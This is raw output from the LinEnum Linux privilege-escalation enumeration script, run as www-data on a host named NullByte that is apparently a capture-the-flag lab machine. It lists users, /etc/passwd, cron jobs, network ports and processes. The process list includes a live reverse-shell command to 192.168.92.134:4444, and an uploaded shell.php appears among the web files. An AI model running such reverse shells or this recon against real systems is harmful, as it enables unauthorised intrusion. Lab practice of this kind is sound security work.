www-data@NullByte:/home/ramses$ ./LinEnum.sh -t
./LinEnum.sh -t

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.98

[-] Debug Info
[+] Thorough tests = Enabled


Scan started at:
Sun Nov 17 08:41:33 HKT 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux


[-] Kernel information (continued):
Linux version 3.16.0-4-686-pae (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17)


[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="https://bugs.debian.org/"


[-] Hostname:
NullByte


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Sun Aug  2 00:08:46 +0800 2015
eric             pts/1    192.168.1.109    Sun Aug  2 00:28:26 +0800 2015
ramses           pts/0    192.168.92.134   Sun Nov 17 07:08:43 +0800 2019


[-] Who else is logged on:
 08:41:33 up  6:42,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ramses   pts/0    192.168.92.134   07:08    3:27   0.12s  0.12s -bash


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=103(systemd-timesync) groups=103(systemd-timesync)
uid=101(systemd-network) gid=104(systemd-network) groups=104(systemd-network)
uid=102(systemd-resolve) gid=105(systemd-resolve) groups=105(systemd-resolve)
uid=103(systemd-bus-proxy) gid=106(systemd-bus-proxy) groups=106(systemd-bus-proxy)
uid=104(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=105(avahi) gid=112(avahi) groups=112(avahi)
uid=106(Debian-exim) gid=114(Debian-exim) groups=114(Debian-exim)
uid=107(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(colord) gid=117(colord) groups=117(colord)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(saned) gid=119(saned) groups=119(saned),113(scanner)
uid=111(hplip) gid=7(lp) groups=7(lp)
uid=1000(bob) gid=1000(bob) groups=1000(bob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner)
uid=1001(eric) gid=1001(eric) groups=1001(eric),27(sudo)
uid=112(mysql) gid=120(mysql) groups=120(mysql)
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x  5 root   root   4.0K Aug  2  2015 .
drwxr-xr-x 21 root   root   4.0K Aug  1  2015 ..
drwxr-xr-x  2 bob    bob    4.0K Aug  2  2015 bob
drwxr-xr-x  2 eric   eric   4.0K Aug  2  2015 eric
drwxr-xr-x  3 ramses ramses 4.0K Nov 10 21:47 ramses


[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 mysql mysql 453 Nov 17 07:17 /var/www/html/uploads/file_upload.php
-rw-rw-rw- 1 mysql mysql 19 Nov 17 07:31 /var/www/html/uploads/phpinfo.php
-rw-rw-rw- 1 mysql mysql 75 Nov 17 08:38 /var/www/html/uploads/shell.php


[-] Hidden files:
-rw-r--r-- 1 root root 29 Aug  1  2015 /usr/lib/pymodules/python2.7/.path
-rw-r--r-- 1 root root 2438 Jun  5  2015 /usr/share/php/.depdb
-rw-r--r-- 1 root root 0 Jun  5  2015 /usr/share/php/.lock
-rw-r--r-- 1 root root 0 Jun  5  2015 /usr/share/php/.depdblock
-rw-r--r-- 1 root root 8273 Jun  5  2015 /usr/share/php/.filemap
-rw-r--r-- 1 root root 54 Jun  5  2015 /usr/share/doc/php5-common/PEAR/.placeholder
-rw-r--r-- 1 eric eric 220 Aug  2  2015 /home/eric/.bash_logout
-rw------- 1 eric eric 545 Aug  2  2015 /home/eric/.bash_history
-rw-r--r-- 1 eric eric 675 Aug  2  2015 /home/eric/.profile
-rw-r--r-- 1 eric eric 3515 Aug  2  2015 /home/eric/.bashrc
-rw-r--r-- 1 bob bob 220 Aug  2  2015 /home/bob/.bash_logout
-rw-r--r-- 1 bob bob 675 Aug  2  2015 /home/bob/.profile
-rw-r--r-- 1 bob bob 3515 Aug  2  2015 /home/bob/.bashrc
-rw-r--r-- 1 ramses ramses 220 Aug  2  2015 /home/ramses/.bash_logout
-rw------- 1 ramses ramses 8192 Nov 10 23:43 /home/ramses/.bash_history
-rw-r--r-- 1 ramses ramses 675 Aug  2  2015 /home/ramses/.profile
-rw-r--r-- 1 ramses ramses 3515 Aug  2  2015 /home/ramses/.bashrc
-rw------- 1 root root 0 Aug  1  2015 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jul 16  2015 /etc/mysql/conf.d/.keepme
-rw-r--r-- 1 root root 102 Oct 26  2014 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 0 May  8  2014 /etc/sensors.d/.placeholder
-rw-r--r-- 1 root root 102 Oct 26  2014 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 220 Nov 13  2014 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 675 Nov 13  2014 /etc/skel/.profile
-rw-r--r-- 1 root root 3515 Nov 13  2014 /etc/skel/.bashrc
-rw-r--r-- 1 root root 680 Aug  2  2015 /etc/init.d/.depend.start
-rw-r--r-- 1 root root 855 Aug  2  2015 /etc/init.d/.depend.stop
-rw-r--r-- 1 root root 1559 Aug  2  2015 /etc/init.d/.depend.boot
-rw-r--r-- 1 root root 102 Oct 26  2014 /etc/cron.hourly/.placeholder
-rw-r--r-- 1 root root 102 Oct 26  2014 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Oct 26  2014 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 0 Nov 17 01:59 /run/network/.ifstate.lock


[-] World-readable files within /home:
-rw-r--r-- 1 eric eric 220 Aug  2  2015 /home/eric/.bash_logout
-rw-r--r-- 1 eric eric 675 Aug  2  2015 /home/eric/.profile
-rw-r--r-- 1 eric eric 3515 Aug  2  2015 /home/eric/.bashrc
-rw-r--r-- 1 bob bob 220 Aug  2  2015 /home/bob/.bash_logout
-rw-r--r-- 1 bob bob 675 Aug  2  2015 /home/bob/.profile
-rw-r--r-- 1 bob bob 3515 Aug  2  2015 /home/bob/.bashrc
-rw-r--r-- 1 ramses ramses 220 Aug  2  2015 /home/ramses/.bash_logout
-rw-r--r-- 1 ramses ramses 675 Aug  2  2015 /home/ramses/.profile
-rwxr-xr-x 1 ramses ramses 50644 Nov 10 21:47 /home/ramses/at
-rwxr-xr-x 1 ramses ramses 194 Nov 10 09:33 /home/ramses/sh
-rw-r--r-- 1 ramses ramses 3515 Aug  2  2015 /home/ramses/.bashrc
-rwxr-xr-x 1 ramses ramses 46108 Nov 10 05:21 /home/ramses/LinEnum.sh
-rw-r--r-- 1 ramses ramses 66 Nov 10 07:32 /home/ramses/libc.so.6.c
-rw-r--r-- 1 ramses ramses 120 Nov 10 08:05 /home/ramses/linux-gate.so.1.c
-rw-r--r-- 1 ramses ramses 0 Nov  9 10:09 /home/ramses/exploit.txt
-rwxr-xr-x 1 ramses ramses 43831 Nov  9 10:09 /home/ramses/postenum.sh


[-] Home directory contents:
total 16K
drwxr-xr-x  4 root root 4.0K Aug  2  2015 .
drwxr-xr-x 12 root root 4.0K Aug  2  2015 ..
drwxrwxrwx  2 root root 4.0K Aug  2  2015 backup
drwxr-xr-x  4 root root 4.0K Aug  2  2015 html


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/home/ramses
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=3
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK		022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Oct 26  2014 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x   2 root root 4096 Aug  2  2015 .
drwxr-xr-x 105 root root 4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  102 Oct 26  2014 .placeholder
-rw-r--r--   1 root root  661 Jun  5  2015 php5

/etc/cron.daily:
total 68
drwxr-xr-x   2 root root  4096 Aug  2  2015 .
drwxr-xr-x 105 root root  4096 Nov 17 08:35 ..
-rw-r--r--   1 root root   102 Oct 26  2014 .placeholder
-rwxr-xr-x   1 root root   625 Mar 15  2015 apache2
-rwxr-xr-x   1 root root 15000 Apr 14  2015 apt
-rwxr-xr-x   1 root root   314 Nov  8  2014 aptitude
-rwxr-xr-x   1 root root   355 Oct 18  2014 bsdmainutils
-rwxr-xr-x   1 root root  1597 Apr 10  2015 dpkg
-rwxr-xr-x   1 root root  4125 Feb 18  2015 exim4-base
-rwxr-xr-x   1 root root    89 Nov  9  2014 logrotate
-rwxr-xr-x   1 root root  1293 Jan  1  2015 man-db
-rwxr-xr-x   1 root root   435 Jun 13  2013 mlocate
-rwxr-xr-x   1 root root   249 Nov 20  2014 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Aug  1  2015 .
drwxr-xr-x 105 root root 4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  102 Oct 26  2014 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Aug  1  2015 .
drwxr-xr-x 105 root root 4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  102 Oct 26  2014 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x   2 root root 4096 Aug  1  2015 .
drwxr-xr-x 105 root root 4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  102 Oct 26  2014 .placeholder
-rwxr-xr-x   1 root root  771 Jan  1  2015 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Systemd timers:
NEXT                         LEFT     LAST                         PASSED UNIT                         ACTIVATES
Mon 2019-11-18 02:14:30 HKT  17h left Sun 2019-11-17 02:14:30 HKT  6h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a                          n/a      n/a                          n/a    systemd-readahead-done.timer systemd-readahead-done.service

2 timers listed.



### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:6c:86:82  
          inet addr:192.168.92.131  Bcast:192.168.92.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe6c:8682/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:806807 errors:0 dropped:0 overruns:0 frame:0
          TX packets:792580 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:91944178 (87.6 MiB)  TX bytes:145369822 (138.6 MiB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:185 errors:0 dropped:0 overruns:0 frame:0
          TX packets:185 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:18821 (18.3 KiB)  TX bytes:18821 (18.3 KiB)


[-] ARP history:
? (192.168.92.134) at 00:0c:29:73:7d:da [ether] on eth0
? (192.168.92.254) at 00:50:56:e0:88:bf [ether] on eth0
? (192.168.92.1) at 00:50:56:c0:00:08 [ether] on eth0
? (192.168.92.2) at 00:50:56:f5:97:ba [ether] on eth0


[-] Nameserver(s):
nameserver 192.168.92.2


[-] Default route:
default         192.168.92.2    0.0.0.0         UG    0      0        0 eth0


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:777             0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:51499           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 ::1:631                 :::*                    LISTEN      -               
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::41605                :::*                    LISTEN      -               
tcp6       0      0 :::777                  :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:11897           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:33654           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:967             0.0.0.0:*                           -               
udp        0      0 127.0.0.1:981           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:52220           0.0.0.0:*                           -               
udp6       0      0 :::111                  :::*                                -               
udp6       0      0 :::50312                :::*                                -               
udp6       0      0 :::5353                 :::*                                -               
udp6       0      0 :::23393                :::*                                -               
udp6       0      0 :::49093                :::*                                -               
udp6       0      0 :::967                  :::*                                -               


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.6   5448  4020 ?        Ss   01:59   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    01:59   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    01:59   0:03 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   01:59   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        S    01:59   0:00 [kworker/u2:0]
root         7  0.0  0.0      0     0 ?        S    01:59   0:01 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    01:59   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    01:59   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    01:59   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   01:59   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    01:59   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   01:59   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S    01:59   0:00 [khungtaskd]
root        15  0.0  0.0      0     0 ?        S<   01:59   0:00 [writeback]
root        16  0.0  0.0      0     0 ?        SN   01:59   0:00 [ksmd]
root        17  0.0  0.0      0     0 ?        SN   01:59   0:00 [khugepaged]
root        18  0.0  0.0      0     0 ?        S<   01:59   0:00 [crypto]
root        19  0.0  0.0      0     0 ?        S<   01:59   0:00 [kintegrityd]
root        20  0.0  0.0      0     0 ?        S<   01:59   0:00 [bioset]
root        21  0.0  0.0      0     0 ?        S<   01:59   0:00 [kblockd]
root        23  0.0  0.0      0     0 ?        S    01:59   0:00 [kswapd0]
root        24  0.0  0.0      0     0 ?        S    01:59   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S<   01:59   0:00 [kthrotld]
root        31  0.0  0.0      0     0 ?        S<   01:59   0:00 [ipv6_addrconf]
root        32  0.0  0.0      0     0 ?        S<   01:59   0:00 [deferwq]
root        33  0.0  0.0      0     0 ?        S    01:59   0:00 [kworker/u2:1]
root        66  0.0  0.0      0     0 ?        S<   01:59   0:00 [ata_sff]
root        67  0.0  0.0      0     0 ?        S    01:59   0:00 [scsi_eh_0]
root        68  0.0  0.0      0     0 ?        S<   01:59   0:00 [scsi_tmf_0]
root        69  0.0  0.0      0     0 ?        S    01:59   0:00 [scsi_eh_1]
root        70  0.0  0.0      0     0 ?        S<   01:59   0:00 [scsi_tmf_1]
root        73  0.0  0.0      0     0 ?        S    01:59   0:00 [khubd]
root        79  0.0  0.0      0     0 ?        S<   01:59   0:00 [kworker/0:1H]
root       100  0.0  0.0      0     0 ?        S    01:59   0:00 [jbd2/sda1-8]
root       101  0.0  0.0      0     0 ?        S<   01:59   0:00 [ext4-rsv-conver]
root       130  0.0  0.0      0     0 ?        S    01:59   0:00 [kauditd]
root       132  0.0  0.5   8264  3456 ?        Ss   01:59   0:00 /lib/systemd/systemd-journald
root       137  0.0  0.6  12828  3568 ?        Ss   01:59   0:00 /lib/systemd/systemd-udevd
root       190  0.0  0.0      0     0 ?        S<   01:59   0:00 [ttm_swap]
root       242  0.0  0.0      0     0 ?        S<   01:59   0:00 [kpsmoused]
root       368  0.0  0.4   4364  2676 ?        Ss   01:59   0:00 /sbin/rpcbind -w
statd      381  0.0  0.4   4560  2868 ?        Ss   01:59   0:00 /sbin/rpc.statd
root       386  0.0  0.0      0     0 ?        S<   01:59   0:00 [rpciod]
root       388  0.0  0.0      0     0 ?        S<   01:59   0:00 [nfsiod]
root       403  0.0  0.0   2908   164 ?        Ss   01:59   0:00 /usr/sbin/rpc.idmapd
root       404  0.0  0.8   8080  4780 ?        Ss   01:59   0:00 /usr/sbin/sshd -D
root       405  0.0  0.4   4992  2784 ?        Ss   01:59   0:00 /usr/sbin/cron -f
daemon     406  0.0  0.2   2636  1688 ?        Ss   01:59   0:00 /usr/sbin/atd -f
root       408  0.0  0.4   3744  2776 ?        Ss   01:59   0:00 /lib/systemd/systemd-logind
avahi      412  0.0  0.4   3548  2736 ?        Ss   01:59   0:00 avahi-daemon: running [NullByte.local]
message+   413  0.0  0.5   5336  3356 ?        Ss   01:59   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       417  0.0  1.1   9232  6860 ?        Ss   01:59   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
avahi      460  0.0  0.0   3548   216 ?        S    01:59   0:00 avahi-daemon: chroot helper
root       470  0.0  0.5  31084  3364 ?        Ssl  01:59   0:00 /usr/sbin/rsyslogd -n
root       472  0.0  0.2   2184  1656 ?        Ss   01:59   0:00 /usr/sbin/acpid
root       497  0.0  0.2   2260  1508 ?        S    01:59   0:00 /bin/sh /usr/bin/mysqld_safe
root       512  0.0  1.0  11888  5868 ?        Ss   01:59   0:00 /usr/sbin/cupsd -f
root       514  0.0  0.7  10004  4556 ?        Ss   01:59   0:00 /usr/sbin/cups-browsed
root       528  0.0  0.3   4164  1912 tty1     Ss+  01:59   0:00 /sbin/agetty --noclear tty1 linux
mysql      886  0.1  9.7 330192 56424 ?        Sl   01:59   0:25 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root       900  0.0  1.7  41304 10076 ?        Sl   01:59   0:01 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid
root       906  0.0  6.0 160948 34792 ?        Ss   01:59   0:01 /usr/sbin/apache2 -k start
Debian-+  1285  0.0  0.5   9936  3084 ?        Ss   01:59   0:00 /usr/sbin/exim4 -bd -q30m
www-data  2104  0.0  4.0 163864 23568 ?        S    06:45   0:05 /usr/sbin/apache2 -k start
www-data  2127  0.0  4.8 163752 27800 ?        S    06:55   0:03 /usr/sbin/apache2 -k start
www-data  2129  0.0  3.9 164264 22700 ?        S    06:56   0:02 /usr/sbin/apache2 -k start
www-data  2130  0.0  3.8 164232 22392 ?        S    06:56   0:02 /usr/sbin/apache2 -k start
www-data  2133  0.0  4.8 164072 28112 ?        S    06:57   0:01 /usr/sbin/apache2 -k start
www-data  2135  0.0  4.0 164260 23364 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data  2137  0.0  3.6 163460 21176 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data  2138  0.0  5.8 167472 33604 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data  2139  0.0  5.0 163772 29176 ?        S    06:58   0:00 /usr/sbin/apache2 -k start
root      2151  0.0  0.9  11316  5748 ?        Ss   07:08   0:00 sshd: ramses [priv] 
ramses    2153  0.0  0.6   4824  3468 ?        Ss   07:08   0:00 /lib/systemd/systemd --user
ramses    2154  0.0  0.1   6280  1124 ?        S    07:08   0:00 (sd-pam)  
ramses    2156  0.0  0.6  11316  3880 ?        S    07:08   0:00 sshd: ramses@pts/0  
ramses    2157  0.0  0.8   6448  4668 pts/0    Ss+  07:08   0:00 -bash
www-data  2376  0.0  2.9 163300 17016 ?        S    07:59   0:00 /usr/sbin/apache2 -k start
root      2435  0.0  0.0      0     0 ?        S    08:26   0:00 [kworker/0:0]
root      2438  0.0  0.0      0     0 ?        S    08:31   0:00 [kworker/0:1]
root      2446  0.0  0.0      0     0 ?        S    08:37   0:00 [kworker/0:2]
www-data  2475  0.0  0.1   2260   664 ?        S    08:41   0:00 sh -c /bin/bash -c 'bash -i >& /dev/tcp/192.168.92.134/4444 0>&1'
www-data  2476  0.0  0.4   3704  2664 ?        S    08:41   0:00 /bin/bash -c bash -i >& /dev/tcp/192.168.92.134/4444 0>&1
www-data  2477  0.0  0.5   3808  3044 ?        S    08:41   0:00 bash -i
www-data  2480  0.0  0.6   4456  3536 ?        S    08:41   0:00 /bin/bash ./LinEnum.sh -t
www-data  2481  0.0  0.5   4508  3244 ?        S    08:41   0:00 /bin/bash ./LinEnum.sh -t
www-data  2482  0.0  0.0   2164   552 ?        S    08:41   0:00 tee -a
root      2595  0.0  0.3  12828  1840 ?        S    08:41   0:00 /lib/systemd/systemd-udevd
www-data  2759  0.0  0.4   4508  2596 ?        S    08:41   0:00 /bin/bash ./LinEnum.sh -t
www-data  2760  0.0  0.3   3160  2032 ?        R    08:41   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
1.1M -rwxr-xr-x 1 root   root   1.1M Nov 13  2014 /bin/bash
   0 lrwxrwxrwx 1 root   root      4 Nov  8  2014 /bin/sh -> dash
1.3M -rwxr-xr-x 1 root   root   1.3M May 27  2015 /lib/systemd/systemd
260K -rwxr-xr-x 1 root   root   258K May 27  2015 /lib/systemd/systemd-journald
528K -rwxr-xr-x 1 root   root   526K May 27  2015 /lib/systemd/systemd-logind
296K -rwxr-xr-x 1 root   root   294K May 27  2015 /lib/systemd/systemd-udevd
 36K -rwxr-xr-x 1 root   root    34K Mar 30  2015 /sbin/agetty
   0 lrwxrwxrwx 1 root   root     20 May 27  2015 /sbin/init -> /lib/systemd/systemd
 76K -rwxr-xr-x 1 root   root    75K Aug 13  2014 /sbin/rpc.statd
 48K -rwxr-xr-x 1 root   root    46K Aug 18  2014 /sbin/rpcbind
508K -rwxr-xr-x 1 root   root   507K May 28  2015 /usr/bin/dbus-daemon
   0 lrwxrwxrwx 1 root   root      9 Mar 17  2015 /usr/bin/python -> python2.7
 52K -rwxr-xr-x 1 root   root    50K Nov  9  2014 /usr/sbin/acpid
608K -rwxr-xr-x 1 root   root   608K Mar 15  2015 /usr/sbin/apache2
 24K -rwxr-xr-x 1 root   root    22K Sep 30  2014 /usr/sbin/atd
 44K -rwxr-xr-x 1 root   root    43K Oct 26  2014 /usr/sbin/cron
 56K -rwxr-xr-x 1 root   root    54K Jul  7  2015 /usr/sbin/cups-browsed
488K -rwxr-xr-x 1 root   root   486K Jun  9  2015 /usr/sbin/cupsd
1.1M -rwsr-xr-x 1 root   root   1.1M Feb 18  2015 /usr/sbin/exim4
 11M -rwxr-xr-x 1 root   root    11M Jul 16  2015 /usr/sbin/mysqld
 32K -rwxr-xr-x 1 root   root    31K Aug 13  2014 /usr/sbin/rpc.idmapd
640K -rwxr-xr-x 1 root   root   638K Oct  2  2014 /usr/sbin/rsyslogd
928K -rwxr-xr-x 1 root   root   927K Mar 23  2015 /usr/sbin/sshd
4.0K -rwxr-xr-x 1 ramses ramses  194 Nov 10 09:33 sh


[-] /etc/init.d/ binary permissions:
total 288
drwxr-xr-x   2 root root  4096 Aug  2  2015 .
drwxr-xr-x 105 root root  4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  1559 Aug  2  2015 .depend.boot
-rw-r--r--   1 root root   680 Aug  2  2015 .depend.start
-rw-r--r--   1 root root   855 Aug  2  2015 .depend.stop
-rw-r--r--   1 root root  2427 Apr  6  2015 README
-rwxr-xr-x   1 root root  2243 Nov  9  2014 acpid
-rwxr-xr-x   1 root root 10077 Feb  1  2015 apache2
-rwxr-xr-x   1 root root  1071 Sep 30  2014 atd
-rwxr-xr-x   1 root root  2401 Apr 14  2015 avahi-daemon
-rwxr-xr-x   1 root root  1276 Apr  6  2015 bootlogs
-rwxr-xr-x   1 root root  1248 Apr  6  2015 bootmisc.sh
-rwxr-xr-x   1 root root  3807 Apr  6  2015 checkfs.sh
-rwxr-xr-x   1 root root  1072 Apr  6  2015 checkroot-bootclean.sh
